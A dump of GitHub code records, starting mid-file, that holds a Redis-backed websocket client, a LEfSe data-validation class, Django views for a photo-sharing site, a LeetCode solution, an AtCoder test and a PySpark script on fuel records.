logging.getLogger(__name__)\n\n\nclass Client:\n async def get(self, name, path, params=None):\n if params is None:\n params = {}\n ctx = {\n 'id': self.id,\n 'name': name,\n 'path': path,\n 'redis': self.redis\n }\n ctx.update(params)\n await execute(ctx, self.interceptors)\n return ctx.get('response')\n\n async def close(self):\n if self.redis is not None:\n self.redis.close()\n await self.redis.wait_closed()\n self.redis = None\n\n def __init__(self, REDIS_URL, REDIS_INFO_KEY, LISTEN_CHANNEL, **argv):\n # 注意初始化要执行 init()\n self.redis_url = REDIS_URL\n self.redis = None\n self.interceptors = [normal['read'], candle['read']]\n self.id = id(self)\n self.redis_path = f\"{REDIS_INFO_KEY}/{self.id}\"\n self.listen_channel = LISTEN_CHANNEL\n\n async def init(self):\n self.redis = await aioredis.create_redis(self.redis_url)\n\n async def send(self, cmd: dict):\n # send cmd to websocket\n # if 'name' not in cmd:\n # logger.warning(f\"未指定 websocket 服务名! {cmd}\")\n cmd['id'] = self.id\n await self.redis.publish_json(self.listen_channel, cmd)\n\n async def open_ws(self, name, auth_params=None):\n if auth_params is None:\n auth_params = {}\n await self.send({\n 'op': 'open',\n 'name': name,\n 'args': auth_params\n })\n # await self.redis.publish_json(LISTEN_CHANNEL)\n await asyncio.sleep(1)\n ret = await self.redis.get(self.redis_path, encoding='utf-8')\n return json.loads(ret)\n\n async def subscribe(self, name, channels: Union[list, str]):\n await self.send({\n 'op': 'subscribe',\n 'name': name,\n 'args': channels if type(channels) == list else [channels]\n })\n await asyncio.sleep(0)\n ret = await self.redis.get(self.redis_path, encoding='utf-8')\n return json.loads(ret)\n\n async def close_ws(self, name):\n await self.send({\n 'op': 'close',\n 'name': name\n })\n await asyncio.sleep(1)\n ret = await self.redis.get(self.redis_path, encoding='utf-8')\n return json.loads(ret)\n\n async def server_quit(self):\n await self.send({\n 'op': 'quit_server'\n })\n await asyncio.sleep(1)\n ret = await self.redis.get(self.redis_path, encoding='utf-8')\n return json.loads(ret)\n\n async def servers(self):\n await self.send({\n 'op': 'servers'\n })\n await asyncio.sleep(1)\n ret = await self.redis.get(self.redis_path, encoding='utf-8')\n return json.loads(ret)\n\n async def redis_clear(self, path=\"okex/*\"):\n # 清除 redis 服务器中的相关数据\n keys = await self.redis.keys(path)\n for key in keys:\n await self.redis.delete(key)\n\n def __del__(self):\n logger.debug('退出')\n if self.redis is not None:\n self.redis.close()\n\n\nasync def client(configs=None) -> Client:\n # 使用些函数初始化 OKEX 类\n if configs is None:\n configs = {}\n configs.update(default_settings)\n okex = Client(**configs)\n await okex.init()\n return okex\n","repo_name":"oscnet/okws","sub_path":"okws/aioclient.py","file_name":"aioclient.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"6580411331","text":"__author__ = \"Timothy Tickle\"\n__copyright__ = \"Copyright 2012\"\n__credits__ = [\"Timothy Tickle\"]\n__license__ = \"MIT\"\n__maintainer__ = \"Timothy Tickle\"\n__email__ = \"ttickle@sph.harvard.edu\"\n__status__ = \"Development\"\n\n#Import local code\nfrom types import *\nimport decimal\nimport os\nimport re\nimport string\n\nclass ValidateData:\n\n #Tested 5\n @staticmethod\n def funcIsValidBoolean(parameterValue):\n \"\"\"\n Validates a parameter as a valid boolean.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid boolean.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if parameterValue == None:\n return False\n\n #Check to make sure it is a string\n if not type(parameterValue) is BooleanType:\n return False\n return True\n\n #Tested 6\n @staticmethod\n def funcIsTrue(parameterValue):\n \"\"\"\n Validates a parameter as true.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is True.\n :type\tBoolean\n \"\"\"\n\n if(ValidateData.funcIsValidBoolean(parameterValue)):\n if(parameterValue == True):\n return True\n return False\n\n #Tested 6\n @staticmethod\n def funcIsFalse(parameterValue):\n \"\"\"\n Validates a parameter as false.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is False.\n :type\tBoolean\n \"\"\"\n\n if(ValidateData.funcIsValidBoolean(parameterValue)):\n if(parameterValue == False):\n return True\n return False\n\n #Tested 5\n @staticmethod\n def funcIsValidInteger(parameterValue):\n \"\"\"\n Validates a parameter as an integer.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is an integer.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if (parameterValue == None):\n return False\n\n #Check to make sure it is an integer\n if not type(parameterValue) is IntType:\n return False\n\n return True\n\n #Tested 5\n @staticmethod\n def funcIsValidPositiveInteger(parameterValue, tempZero = False):\n \"\"\"\n Validates a parameter as false.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :param\ttempZero:\tAllows one to set what the value for zero should return.\n :type\tBoolean\tThe return value for zero.\n :return\tBoolean:\tTrue indicates the parameter is a positive integer.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if not ValidateData.funcIsValidInteger(parameterValue):\n return False\n\n #Check to see it is positive\n if (parameterValue < 0):\n return False\n\n #Check for zero value\n if(parameterValue == 0):\n return tempZero\n return True\n\n #Tested 14\n @staticmethod\n def funcIsValidNumeric(parameterValue):\n \"\"\"\n Validates a parameter as an integer.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a numeric.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if (parameterValue == None):\n return False\n #Check to make sure it is an integer\n if((type(parameterValue) == IntType)or(type(parameterValue) == LongType)or(type(parameterValue) == FloatType)or(type(parameterValue) == ComplexType)or(str(type(parameterValue)) == \"\")):\n if(not type(parameterValue) == BooleanType):\n return True\n return False\n\n #Tested 5\n @staticmethod\n def funcIsValidStringType(parameterValue):\n \"\"\"\n Validates a parameter as a string. This allows the string to be blank or empty.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a string type.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if parameterValue == None:\n return False\n\n #Check to make sure it is a string\n if not type(parameterValue) is StringType:\n return False\n\n return True\n\n #Tested 5\n @staticmethod\n def funcIsValidString(parameterValue):\n \"\"\"\n Validates a parameter as a string. Does NOT allow string to be blank or empty.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a string.\n :type\tBoolean\n \"\"\"\n\n #Type check\n if not ValidateData.funcIsValidStringType(parameterValue):\n return False\n\n #Check to see it is not blank\n if parameterValue.strip() == \"\":\n return False\n return True\n\n @staticmethod\n def funcIsValidStringInt(parameterValue):\n \"\"\"\n Validates a parameter that is a string as a format which is an integer.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n \"\"\"\n\n #Type string check\n if not ValidateData.funcIsValidStringType(parameterValue):\n return False\n\n #Check to see if the string can be converted to an integer\n try:\n int(parameterValue)\n except:\n return False\n return True\n\n @staticmethod\n def funcIsValidStringFloat(parameterValue):\n \"\"\"\n Validates a parameter that is a string as a format which is a numeric.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n \"\"\"\n\n #Type string check\n if not ValidateData.funcIsValidStringType(parameterValue):\n return False\n\n #Check to see if the string can be converted to a double\n try:\n float(parameterValue)\n except:\n return False\n return True\n\n #Tested 6\n @staticmethod\n def funcIsValidFormatString(parameterValue):\n \"\"\"\n Validates a parameter as a valid format string.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n lettersValid = False\n if ValidateData.funcIsValidString(parameterValue):\n validChars = \"BbcdfHhIiLlPpsx0123456789\"\n for letter in parameterValue:\n lettersValid = letter in validChars\n if(not lettersValid):\n break\n return lettersValid\n\n #Tested 5\n @staticmethod\n def funcIsValidChar(parameterValue):\n \"\"\"\n Validates a parameter as a valid character.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n return ValidateData.funcIsValidString(parameterValue)\n\n #Tested 13\n @staticmethod\n def funcIsValidPositiveNumberChar(parameterValue):\n \"\"\"\n Validates a parameter as a valid character representing a number.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure is a valid string\n if not ValidateData.funcIsValidString(parameterValue):\n return False\n\n #Try to convert to decimal\n try:\n decimalConversion = decimal.Decimal(parameterValue)\n if decimalConversion < 0:\n return False\n except:\n return False\n return True\n\n #Tested 9\n @staticmethod\n def funcIsValidFlagChar(parameterValue):\n \"\"\"\n Validates a parameter as a valid character representing a boolean.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n if parameterValue == '0' or parameterValue == \"0\" or parameterValue == '1' or parameterValue == \"1\":\n return True\n return False\n\n #Tested 15\n @staticmethod\n def funcIsValidBoundedIntegerChar(parameterValue, iValueOne, iValueTwo):\n \"\"\"\n Validates a parameter as a valid characater that represents an integer inclusively bounded by two given values.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :param\tiValueOne:\tOne bound for the value.\n :type\tInteger\n :param\tiValueTwo:\tThe other bound for the data.\n :type\tInteger\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure is a valid string\n if not ValidateData.funcIsValidString(parameterValue):\n return False\n\n #Check to make sure is a valid integer\n if not ValidateData.funcIsValidInteger(iValueOne):\n return False\n\n #Check to make sure is a valid integer\n if not ValidateData.funcIsValidInteger(iValueTwo):\n return False\n\n #Try to convert to decimal\n try:\n intConversion = int(parameterValue)\n if(iValueOne < iValueTwo):\n if ((intConversion >= iValueOne) and (intConversion <= iValueTwo)):\n return True\n return False\n if(iValueTwo < iValueOne):\n if ((intConversion >= iValueTwo) and (intConversion <= iValueOne)):\n return True\n return False\n if(iValueOne == iValueTwo):\n if (intConversion == iValueOne):\n return True\n return False\n except:\n return False\n\n #Tested 9\n @staticmethod\n def funcIsValidList(parameterValue):\n \"\"\"\n Validates a parameter as a list.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a list\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if parameterValue == None:\n return False\n\n #Check to make sure it is a list\n if not type(parameterValue) is ListType:\n return False\n\n #Check elements\n listSize = len(parameterValue)\n for i in range(0,listSize):\n if parameterValue[i] == None:\n return False\n if type(parameterValue[i]) is ListType:\n if ValidateData.funcIsValidList(parameterValue[i]) == False:\n return False\n return True\n\n #Tested 9\n @staticmethod\n def funcIsValidTuple(parameterValue):\n \"\"\"\n Validates a parameter as a tuple.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a tuple\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if parameterValue == None:\n return False\n\n #Check to make sure it is a string\n if not type(parameterValue) is TupleType:\n return False\n\n #Check elements\n tupleSize = len(parameterValue)\n for i in range(0,tupleSize):\n if parameterValue[i] == None:\n return False\n if type(parameterValue[i]) is TupleType:\n if ValidateData.funcIsValidTuple(parameterValue[i]) == False:\n return False\n return True\n\n #Tested 7\n @staticmethod\n def funcIsValidNumericList(parameterValue):\n \"\"\"\n Validates a parameter as a list of numeric values.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a list of numeric values.\n :type\tBoolean\n \"\"\"\n\n #Check is valid list\n if(not ValidateData.funcIsValidList(parameterValue)):\n return False\n\n #Check elements\n listSize = len(parameterValue)\n for i in range(0,listSize):\n if(not ValidateData.funcIsValidNumeric(parameterValue[i])):\n return False\n return True\n\n #Tested 7\n @staticmethod\n def funcIsValidStringList(parameterValue):\n \"\"\"\n Validates a parameter as a list of string values.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a list of string values.\n :type\tBoolean\n \"\"\"\n\n #Check is valid list\n if(not ValidateData.funcIsValidList(parameterValue)):\n return False\n\n #Check elements\n listSize = len(parameterValue)\n for i in range(0,listSize):\n if(not ValidateData.funcIsValidString(parameterValue[i])):\n return False\n return True\n\n #Tested 4\n @staticmethod\n def funcIsValidNPArray(parameterValue):\n \"\"\"\n Validates a parameter as a numpy array.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a numpy array.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if parameterValue == None:\n return False\n\n #Check to make sure it is a structure array\n if not str(type(parameterValue)) == \"\":\n return False\n\n return True\n\n #Tested 9\n @staticmethod\n def funcIsValidDictionary(parameterValue):\n \"\"\"\n Validates a parameter as a dictionary.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a dictionary.\n :type\tBoolean\n \"\"\"\n\n #Check to make sure it is not null\n if parameterValue == None:\n return False\n\n #Check to make sure it is a string\n if not type(parameterValue) is DictType:\n return False\n\n #Check key elements\n keyList = list(parameterValue.keys())\n keyListSize = len(keyList)\n for i in range(0,keyListSize):\n if keyList[i] == None:\n return False\n if type(keyList[i]) is ListType:\n if validateData.funcIsValidList(keyList[i]) == False:\n return False\n\n #Check key elements\n itemList = list(parameterValue.values())\n itemListSize = len(itemList)\n\n for i in range(0,itemListSize):\n if itemList[i] == None:\n return False\n if type(itemList[i]) is ListType:\n if ValidateData.funcIsValidList(itemList[i]) == False:\n return False\n return True\n\n #Tested 18\n @staticmethod\n def funcIsValidDNASequence(parameterValue):\n \"\"\"\n Validates a parameter as a valid DNA sequence.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n if ValidateData.funcIsValidString(parameterValue):\n expression = re.compile(r'[^atcgATCG]')\n if not None == expression.search(parameterValue):\n return False\n return True\n return False\n\n #Tested 15\n @staticmethod\n def funcIsValidNucleotideBase(parameterValue):\n \"\"\"\n Validates a parameter as a character which is a valid nucleotide representation.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n if (ValidateData.funcIsValidDNASequence(parameterValue) or (parameterValue == 'u') or (parameterValue == \"U\")):\n if (len(parameterValue) == 1):\n return True\n return False\n\n #Testing 4\n @staticmethod\n def funcIsValidFileName(parameterValue):\n \"\"\"\n Validates a parameter as a valid file name.\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid file path.\n :type\tBoolean\n \"\"\"\n\n if parameterValue is None:\n return False\n elif(ValidateData.funcIsValidString(parameterValue)):\n return os.path.exists(parameterValue)\n return False\n\n #Tested 5\n @staticmethod\n def funcIsValidClass(parameterValue, strCorrectName):\n \"\"\"\n Validates a parameter as a valid class (of a specifc type given by name).\n\n :param\tparameterValue:\tValue to be evaluated.\n :type\tUnknown\n :param\tstrCorrectName:\tName of te class the parameter should be.\n :type\tUnknown\n :return\tBoolean:\tTrue indicates the parameter is a valid value.\n :type\tBoolean\n \"\"\"\n\n if(parameterValue==None):\n return False\n if not ValidateData.funcIsValidString(strCorrectName):\n return False\n classType = type(parameterValue).__name__\n if(classType == strCorrectName):\n return True\n if(classType == 'instance'):\n if(parameterValue.__class__.__name__==strCorrectName):\n return True\n else:\n return False\n return False\n","repo_name":"SegataLab/lefse","sub_path":"lefsebiom/ValidateData.py","file_name":"ValidateData.py","file_ext":"py","file_size_in_byte":17768,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"6"} +{"seq_id":"24309552973","text":"from django.contrib.auth.models import User\nfrom django.db.models import Case, When\nfrom django.http import Http404, JsonResponse, HttpResponseBadRequest\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom django.views import generic as views\nfrom django.views.generic.base import ContextMixin\nfrom django.template import loader\n\n\nfrom django.contrib.auth import mixins as auth_mixins\n\nfrom devstagram.async_chat.models import ChatRoom, PostMessage\nfrom devstagram.async_chat.utils.room_create import create_room\nfrom devstagram.mainsite.forms import PictureUploadForm, FriendRequestForm, FriendshipForm, PictureUpdateForm, \\\n CommentForm, ProfilePictureUploadForm\nfrom devstagram.mainsite.models import Picture, FriendRequest, Like, Friendship, Comment, ProfilePicture, UserFriends\n\nfrom itertools import chain\n\n\ndef get_pictures():\n queryset = Picture.objects.order_by('-upload_date')\n return queryset\n\n\nclass WelcomePage(views.View):\n def get(self, request, *args, **kwargs):\n return render(request, 'landing_page.html')\n\n\nclass IndexView(views.ListView):\n template_name = 'index.html'\n context_object_name = 'pictures'\n\n def get_queryset(self):\n self.queryset = get_pictures()\n return self.queryset\n\n\nclass PictureUploadView(views.CreateView):\n model = Picture\n form_class = PictureUploadForm\n template_name = 'picture_upload.html'\n success_url = reverse_lazy('index')\n\n def form_valid(self, form):\n picture = form.save(commit=False)\n picture.user = self.request.user\n return super().form_valid(form)\n\n\nclass LikePicture(auth_mixins.LoginRequiredMixin, ContextMixin, views.View):\n def get(self, request, *args, **kwargs):\n picture = Picture.objects.get(pk=kwargs['pk'])\n user_id_list = picture.likes_as_flat_list()\n action = None\n user = request.user\n if user.id not in user_id_list:\n like = Like(picture_id=picture.id, user_id=user.id)\n like.save()\n action = 'like'\n else:\n like = Like.objects.get(picture_id=picture.id, user_id=user.id)\n like.delete()\n action = 'unlike'\n likes = Like.objects.filter(picture_id=picture.id).count()\n # pictures = get_pictures(user)\n pictures = Picture.objects.filter(pk=kwargs['pk'])\n\n template = loader.render_to_string(\n template_name='index.html',\n context={'pictures': pictures},\n request=self.request, using=None)\n\n return JsonResponse(data={'template': template,\n 'context': {\n 'likes': likes,\n 'user_id': user.id,\n 'id_list': list(user_id_list),\n 'action': action\n }\n })\n\n\nclass ProfileView(views.DetailView):\n model = User\n template_name = 'profile.html'\n slug_url_kwarg = 'slug'\n\n def get_object(self, queryset=None):\n return User.objects.get(username=self.kwargs.get('slug'))\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n user = self.get_object()\n request_user = self.request.user\n try:\n profile_picture = ProfilePicture.objects.get(user=self.get_object())\n except(Exception) as ex:\n profile_picture = ProfilePicture(user=self.get_object())\n profile_picture.image = 'pictures/default.png'\n profile_picture.save()\n\n if not self.request.user.is_anonymous:\n friendship = Friendship.objects.filter(friend_one_id=user.id, friend_two_id=request_user.id) | \\\n Friendship.objects.filter(friend_one_id=request_user.id, friend_two_id=user.id)\n\n is_friend_request_sent = FriendRequest.objects.filter(sender=request_user, receiver=user).exists()\n context['friendship'] = True if friendship else False\n context['is_friend_request_sent'] = is_friend_request_sent\n\n friends = (Friendship.objects.filter(friend_one=user) | Friendship.objects.filter(\n friend_two=user)).values_list('friend_one_id', 'friend_two_id')\n friends_id = set(chain(*friends))\n if user.id in friends_id:\n friends_id.remove(user.id)\n\n friends = User.objects.filter(id__in=friends_id)\n\n context['friends'] = friends\n context['pictures'] = Picture.objects.filter(user=user)\n context['profile_picture'] = profile_picture\n return context\n\n\nclass FriendRequestView(auth_mixins.LoginRequiredMixin, views.View):\n template_name = 'profile.html'\n success_url = 'index'\n\n def post(self, request, *args, **kwargs):\n form = FriendRequestForm()\n fr = form.save(commit=False)\n sender = User.objects.get(username=request.POST['sender'])\n receiver = User.objects.get(username=request.POST['receiver'])\n\n try:\n friend_request = FriendRequest.objects.get(sender=sender, receiver=receiver)\n friend_request.delete()\n\n except FriendRequest.DoesNotExist:\n fr.sender = sender\n fr.receiver_id = receiver.id\n fr.save()\n return redirect('profile', receiver)\n\n\nclass CreateFriendship(views.View):\n template_name = 'profile.html'\n\n def post(self, request, *args, **kwargs):\n form = FriendshipForm()\n friendship = form.save(commit=False)\n sender_username = request.POST['sender']\n receiver_username = request.POST['receiver']\n sender = User.objects.get(username=sender_username)\n receiver = User.objects.get(username=receiver_username)\n sender_friends, created = UserFriends.objects.get_or_create(user=sender)\n receiver_friends, created = UserFriends.objects.get_or_create(user=receiver)\n\n if request.POST['answer'] == 'accepted':\n friendship.friend_one = sender\n friendship.friend_two = receiver\n friendship.save()\n sender_friends.friends += 1\n receiver_friends.friends += 1\n sender_friends.save()\n receiver_friends.save()\n\n request_to_remove = FriendRequest.objects.get(sender=sender, receiver=receiver)\n request_to_remove.delete()\n\n return redirect('index')\n\n\nclass PictureDisplayView(views.DetailView):\n model = Picture\n template_name = 'picture_display.html'\n slug_url_kwarg = 'slug'\n\n def get_object(self, queryset=None):\n picture = Picture.objects.get(pk=self.kwargs.get('pk'))\n return picture\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n picture = self.get_object()\n form = CommentForm()\n comments = Comment.objects.filter(picture_id=picture.id)\n context['picture'] = picture\n context['form'] = form\n context['comments'] = comments\n return context\n\n\nclass PictureEditView(views.View):\n\n def get(self, request, *args, **kwargs):\n pk = kwargs.get('pk')\n picture = Picture.objects.get(pk=pk)\n if request.user.id != picture.user_id:\n raise Http404('Access denied')\n form = PictureUpdateForm(instance=picture)\n context = {'pk': pk, 'form': form, 'picture': picture}\n return render(request, 'picture_edit.html', context)\n\n def post(self, request, *args, **kwargs):\n pk = kwargs.get('pk')\n picture = Picture.objects.get(pk=pk)\n form = PictureUpdateForm(request.POST, request.FILES, instance=picture)\n if form.is_valid():\n edited_form = form.save(commit=False)\n if not request.FILES:\n edited_form.picture = picture.picture\n\n edited_form.user_id = request.user.id\n edited_form.save()\n return redirect('index')\n\n\nclass PictureDeleteView(views.DeleteView):\n model = Picture\n template_name = 'picture_display.html'\n success_url = reverse_lazy('index')\n\n def get(self, request, *args, **kwargs):\n return HttpResponseBadRequest('Not allowed')\n\n\nclass CommentPictureView(auth_mixins.LoginRequiredMixin, views.View):\n template_name = 'picture_display.html'\n\n def post(self, request, *args, **kwargs):\n picture_id = request.POST['pic_id']\n form = CommentForm(request.POST)\n comment = form.save(commit=False)\n comment.user = request.user\n comment.picture_id = picture_id\n comment.save()\n\n picture = Picture.objects.get(pk=picture_id)\n comments = Comment.objects.filter(picture_id=picture.id)\n context = {\n 'form': CommentForm,\n 'comments': comments,\n 'picture': picture\n }\n return redirect('picture display', picture.user, picture_id)\n\n\nclass DeleteCommentView(views.DeleteView):\n model = Comment\n\n def get_success_url(self):\n pk = self.request.POST['pic-pk']\n username = self.get_object().user.username\n print(username, 'username')\n return reverse_lazy('picture display', kwargs={'slug': username, 'pk': pk})\n\n\nclass ProfilePictureUploadView(views.View):\n template_name = 'profile_picture.html'\n\n def get(self, request, *args, **kwargs):\n current_picture = ProfilePicture.objects.get(user=request.user)\n form = ProfilePictureUploadForm()\n context = {\n 'form': form,\n 'currentpfp': current_picture\n }\n\n return render(request, 'profile_picture.html', context)\n\n def post(self, request, *args, **kwargs):\n current_picture = ProfilePicture.objects.get(user=request.user)\n form = ProfilePictureUploadForm(request.POST, request.FILES, instance=current_picture)\n if not request.FILES:\n return redirect('profile', request.user.username)\n if form.is_valid():\n picture = form.save(commit=False)\n\n old_picture = ProfilePicture.objects.get(user=request.user)\n if not str(old_picture.image).split('/')[1] == 'default.png':\n old_picture.image.delete()\n\n picture.picture = request.FILES['image']\n picture.user = request.user\n picture.save()\n return redirect('profile', request.user.username)\n\n\nclass SearchView(views.ListView):\n template_name = 'search.html'\n context_object_name = 'searched_users_all_likes'\n\n def get_users(self, users):\n all_likes = []\n for user in users:\n likes = 0\n for pic in user.picture_set.all():\n likes += len(pic.likes_as_flat_list())\n all_likes.append(likes)\n zipped_list = list(zip(users, all_likes))\n return zipped_list\n\n def get_queryset(self):\n search = self.request.GET['q']\n users = User.objects.filter(username__icontains=search)\n self.queryset = self.get_users(users)\n\n # Sort the queryset\n try:\n order = self.request.GET['order']\n except MultiValueDictKeyError:\n order = 'date-joined-asc'\n if order == 'likes-desc':\n return sorted(self.queryset, key=lambda x: -x[1])\n elif order == 'likes-asc':\n return sorted(self.queryset, key=lambda x: x[1])\n\n elif order == 'posts-asc':\n return sorted(self.queryset, key=lambda x: x[0].picture_set.count())\n elif order == 'posts-desc':\n return sorted(self.queryset, key=lambda x: x[0].picture_set.count(), reverse=True)\n\n elif 'friends' in order:\n users_ids = [user.id for user in users]\n if order == 'friends-desc':\n userfriends = UserFriends.objects.filter(user_id__in=users_ids).order_by('-friends')\n else:\n userfriends = UserFriends.objects.filter(user_id__in=users_ids).order_by('friends')\n\n sorted_user_ids = [user.user_id for user in userfriends]\n preserved = Case(*[When(pk=pk, then=pos) for pos, pk in enumerate(sorted_user_ids)])\n users = User.objects.filter(pk__in=sorted_user_ids).order_by(preserved)\n\n elif order == 'date-joined-desc':\n users = users.order_by('-date_joined')\n\n elif order == 'date-joined-asc':\n users = users.order_by('date_joined')\n\n self.queryset = self.get_users(users)\n return self.queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['q'] = self.request.GET['q']\n return context\n\n\nclass SendPostViaMessage(views.View):\n\n def post(self, request, *args, **kwargs):\n pk = int(request.POST['send-to'])\n sender = request.user\n receiver = User.objects.get(pk=pk)\n chatroom = create_room(sender.username, receiver.username)\n chatroom = chatroom['chatroom']\n pic_pk = request.POST['pic-pk']\n picture = Picture.objects.get(pk=pic_pk)\n owner = picture.user\n msg = PostMessage(chatroom=chatroom, sender=sender, post_owner=owner, post_image=picture)\n msg.save()\n chatroom.update_last_msg_time()\n return redirect('index')\n","repo_name":"gpavlov21/Devstagram","sub_path":"devstagram/devstagram/mainsite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"40966829322","text":"#\n# @lc app=leetcode id=347 lang=python3\n#\n# [347] Top K Frequent Elements\n#\n\n# @lc code=start\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n hashmap = {}\n for num in nums:\n hashmap[num] = hashmap.get(num, 0) + 1\n \n freq = [[] for i in range(len(nums) + 1)]\n\n for n, c in hashmap.items():\n freq[c].append(n)\n \n ans = []\n for i in range(len(freq)-1, -1, -1):\n for j in freq[i]:\n if k > 0:\n ans.append(j)\n k -= 1\n return ans\n\n\n# Notes (6/5/2023)\n\n# Potential solution: Use max heap\n# For each element, count the number of occurrences and put them in a set\n# We don’t have to sort the whole hashmap because we only want the top k elements\n# Heapify() can be done in linear time\n# Each pop will be O(logn)\n# So, the time complexity is O(k*logn)\n\n# Solution in linear time:\n# Use an array where the position represents a count and the value represent the number\n# Notice that the size of the array is bounded to n where n is the number of elements in the input\n# time complexity: O(n)\n# space complexity: O(n)\n# - Array and hashmap to count the occurrences of each value\n\n \n# @lc code=end\n\n","repo_name":"saki-imai-1204/leetcode","sub_path":"code/347.top-k-frequent-elements.py","file_name":"347.top-k-frequent-elements.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27211812799","text":"import pytest\n\nfrom practice_atcoder.book_algorithm_solution.chapter3.takusannosuusiki import question\n\n\n# AtCoder Beginner Contest 051 B - Sum of Three Integers.\nclass Test(object):\n @pytest.mark.parametrize(\"s,expect\", [\n (\"125\", \"176\"),\n (\"9999999999\", \"12656242944\")\n ])\n def test(self, s, expect):\n assert question(s) == expect\n","repo_name":"powerpenguincat/practice-atcoder","sub_path":"tests/book_algorithm_solution/chapter3/test_takusannosuusiki.py","file_name":"test_takusannosuusiki.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5459684630","text":"# 載入函式庫\nfrom pyspark.sql import *\nfrom pyspark.sql.types import IntegerType\nfrom pyspark.sql.functions import *\n\n# 讀入資料\ndfSql = sqlContext.read.csv(\"Ubus215.csv\", header=True)\n\n# 變更資料型態\ndfSql = dfSql.withColumn(\"Qty\", dfSql[\"Qty\"].cast(IntegerType()))\ndfSql = dfSql.withColumn(\"TDate\", to_date(dfSql[\"TDate\"], \"yyyyMMdd\").cast(\"date\"))\n\n\n# 取出客戶代號\nlistCustomer = dfSql.select(\"CusAUnt\").distinct().collect()\n# 取出車輛牌照號碼\nlistCar = dfSql.select(\"CarNo\").distinct().collect()\n\n# 取出加油站代號\nlistStd = dfSql.select(\"StdNo\").distinct().collect()\n\n# 取出加油日期\nlistTdate = dfSql.select(\"TDate\").distinct().sort(dfSql[\"TDate\"])\n\nyearRange = []\nRange = []\n\nfor idxItem in listTdate.collect():\n idxItem[0].year\n idxItem[0].month\n idxItem[0].day\n\n# 取出車輛的加油地點\nfor idxCar in range(len(listCar)):\n print(idxCar, listCar[idxCar][0])\n dfSql.where(dfSql[\"CarNo\"] == listCar[idxCar][0]).select('StdNo').distinct().collect()\n dfSql.where(dfSql[\"CarNo\"] == listCar[idxCar][0]).select(\"Qty\").toPandas().sum()\n\ndateFrom = 